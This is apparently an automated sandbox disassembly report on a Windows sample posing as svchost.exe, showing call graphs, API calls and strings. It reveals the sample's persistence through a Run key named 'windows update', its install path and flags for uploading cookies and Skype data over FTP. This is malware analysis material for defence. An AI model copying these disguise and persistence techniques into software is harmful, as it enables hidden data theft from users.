??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1985->2020 1986->1996 1987 672c59 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpPutFileA 1993 67333d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1987->1993 1988->1985 1988->1988 1990 672e3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 2017 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1990->2017 1992 672faf fclose fclose 1992->1996 1997 672fd3 6 API calls 1992->1997 1993->1996 1994 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 1994->1967 1998 673432 8 API calls 1994->1998 1995 672e55 6 API calls 1999 672ef4 8 API calls 1995->1999 2000 672ec1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1995->2000 1996->1969 1996->1970 1996->1976 1996->1982 1996->1990 1996->1992 1996->1993 2001 673083 7 API calls 1997->2001 2002 673050 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1997->2002 1998->1967 1999->1996 2000->1999 2000->2000 2018 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2001->2018 2002->2001 2002->2002 2004 673121 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2005 6731a6 9 API calls 2004->2005 2006 673173 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2004->2006 2007 673283 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 2005->2007 2008 673249 2005->2008 2006->2005 2006->2006 2019 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2007->2019 2010 673250 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2008->2010 2010->2007 2010->2010 2011 6732b7 7 API calls 2011->1996 2011->1997 2012->1952 2013->1952 2014->1965 2015->1979 2016->1987 2017->1995 2018->2004 2019->2011 2020->1994 2023 671180 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2024 6711d5 2023->2024 2025 671209 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2024->2025 2026 673780 DestroyWindow 2033 67529e 2034 6752da 2033->2034 2036 6752b0 2033->2036 2035 6752d5 ?terminate@ 2035->2034 2036->2034 2036->2035 2041 673398 2042 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2041->2042 2042->2042 2043 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 2042->2043 2050 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2043->2050 2045 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 2046 673432 8 API calls 2045->2046 2047 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2045->2047 2046->2047 2048 674bfc 7 API calls 2047->2048 2049 673557 2048->2049 2050->2045

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 671480-6714d4 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 1 671a56-671a73 call 674bfc 0->1 2 6714da-671533 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 6712b0 0->2 7 671535-671558 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 2->7 8 67155a-67159b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 2->8 7->7 7->8 9 6715c7-6715cd 8->9 10 67159d 8->10 12 6715f5-671636 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 9->12 13 6715cf 9->13 11 6715a0-6715c5 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 10->11 11->9 11->11 15 67165f-671665 12->15 16 671638-67165d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 12->16 14 6715d0-6715f3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 13->14 14->12 14->14 17 671667 15->17 18 671695-6716d4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 15->18 16->15 16->16 19 671670-671693 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 17->19 20 6716d6-6716fb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 18->20 21 6716fd-671703 18->21 19->18 19->19 20->20 20->21 22 671705-671728 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 21->22 23 67172a-671769 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 21->23 22->22 22->23 24 671797-67179d 23->24 25 67176b 23->25 27 6717c5-671806 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 24->27 28 67179f 24->28 26 671770-671795 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 25->26 26->24 26->26 30 67182f-671835 27->30 31 671808-67182d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 27->31 29 6717a0-6717c3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 28->29 29->27 29->29 32 671837 30->32 33 671865-6718a4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 30->33 31->30 31->31 34 671840-671863 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 32->34 35 6718a6-6718cb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 33->35 36 6718cd-6718d3 33->36 34->33 34->34 35->35 35->36 37 6718d5-6718f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 36->37 38 6718fa-67193b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 36->38 37->37 37->38 39 671967-67196d 38->39 40 67193d 38->40 41 671995-6719dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 39->41 42 67196f 39->42 43 671940-671965 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 40->43 45 671a07-671a0d 41->45 46 6719de 41->46 44 671970-671993 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 42->44 43->39 43->43 44->41 44->44 48 671a35-671a50 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 45->48 49 671a0f 45->49 47 6719e0-671a05 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 46->47 47->45 47->47 48->1 50 671a10-671a33 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 49->50 50->48 50->50
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C,26DFE5F7,6D4EE41E,?), ref: 006714BD
      • fopen.MSVCR90 ref: 006714C4
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006714DE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 006714F5
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,nnumber=%d,FFFFFFFF), ref: 0067150C
      • sprintf.MSVCR90 ref: 00671519
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00671527,?,?, ), ref: 006712B7
        • Part of subcall function 006712B0: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?, ), ref: 006712CB
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?, ), ref: 006712D8
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?, ), ref: 0067153A
      • fputc.MSVCR90 ref: 0067154E
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?, ), ref: 00671563
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload skype=%d,00000000,?,?, ), ref: 0067157C
      • sprintf.MSVCR90 ref: 00671583
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671592
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006715AC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006715BC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006715D5
      • fputc.MSVCR90 ref: 006715E9
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 006715FE
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload cookie=%d,00000000), ref: 00671617
      • sprintf.MSVCR90 ref: 0067161E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067162D
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00671644
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671654
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671675
      • fputc.MSVCR90 ref: 00671689
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??4?$basic_string@?erase@?$basic_string@V01@V12@fputcsprintf$??0?$basic_string@fopen
      • String ID: $just reinstall=%d$nnumber=%d$reg path s=%s$starts=%d$sub=%d$tics=%d$upload cookie=%d$upload skype=%d$version=%d
      • API String ID: 3813119273-1331763688
      • Opcode ID: 114550444df9eeb68e8e461f43b8b6b1785afe85e31e5c087768154964f771b5
      • Instruction ID: 29b50c465d9bfa04c61de21cac1eaea052620051508cabb7ab56165b38578138
      • Opcode Fuzzy Hash: 114550444df9eeb68e8e461f43b8b6b1785afe85e31e5c087768154964f771b5
      • Instruction Fuzzy Hash: 18029E71508701AFD708DF24ED99AAAB7B6FB85701F00951DF48E971A1DB309E88CF62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 51 674500-6746ba GetLocalTime ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 671260 * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateDirectoryA ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 58 674707-67472a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z 51->58 59 6746bc-674702 RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z RegSetValueExA RegCloseKey call 671480 51->59 61 674730-674744 fgetc 58->61 66 6749d7-674a2f call 671480 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 call 674bfc 59->66 63 674993-67499c ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z 61->63 64 67474a-67476c ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 61->64 65 6749a2-6749b0 feof 63->65 70 674771-674787 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 64->70 65->61 68 6749b6-6749d1 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 65->68 68->66 72 6747af-6747c2 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 70->72 73 674789-6747aa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 70->73 74 6747e5-6747f8 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 72->74 75 6747c4-6747e0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 72->75 73->72 80 67481b-67482e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 74->80 81 6747fa-674816 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 74->81 75->74 85 674851-674864 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 80->85 86 674830-67484c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 673560 80->86 81->80 89 674887-67489a ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 85->89 90 674866-674882 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 673560 85->90 86->85 91 6748bd-6748d0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 89->91 92 67489c-6748b8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 89->92 90->89 97 6748f3-674906 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 91->97 98 6748d2-6748ee ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6736a0 91->98 92->91 101 674929-67493c ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 97->101 102 674908-674924 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 673560 97->102 98->97 105 674982-674991 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 101->105 106 67493e-67497c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6735f0 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 101->106 102->101 105->65 106->105
      APIs
      • GetLocalTime.KERNEL32(0067844C,26DFE5F7,?,?), ref: 0067453F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,?,?), ref: 0067454E
      • GetUserNameA.ADVAPI32(?), ref: 00674574
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update,?), ref: 0067458D
      • sprintf.MSVCR90 ref: 0067459A
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676B34,?,?,?), ref: 006745B3
      • sprintf.MSVCR90 ref: 006745BA
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 006745DB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 006745EF
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,"%s\svchost.exe",00000000), ref: 00674601
      • sprintf.MSVCR90 ref: 00674608
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,?,?,00000000), ref: 0067461E
      • CreateDirectoryA.KERNELBASE(00000000,?,?,00000000), ref: 00674625
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,\status_f.txt,?,?,00000000), ref: 0067463A
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 00674651
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00674663
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00674673
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\config), ref: 00674682
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00674692
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C), ref: 006746A3
      • fopen.MSVCR90 ref: 006746AA
      • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 006746CB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000070,?,00000000), ref: 006746D7
      • RegSetValueExA.ADVAPI32(?,windows update,00000000,00000001,00000000,?,00000000), ref: 006746EC
      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006746F7
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C,26DFE5F7,6D4EE41E,?), ref: 006714BD
        • Part of subcall function 00671480: fopen.MSVCR90 ref: 006714C4
        • Part of subcall function 00671480: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006714DE
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 006714F5
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,nnumber=%d,FFFFFFFF), ref: 0067150C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671519
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?, ), ref: 0067153A
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 0067154E
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?, ), ref: 00671563
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload skype=%d,00000000,?,?, ), ref: 0067157C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671583
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671592
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006715AC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006715BC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006715D5
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 006715E9
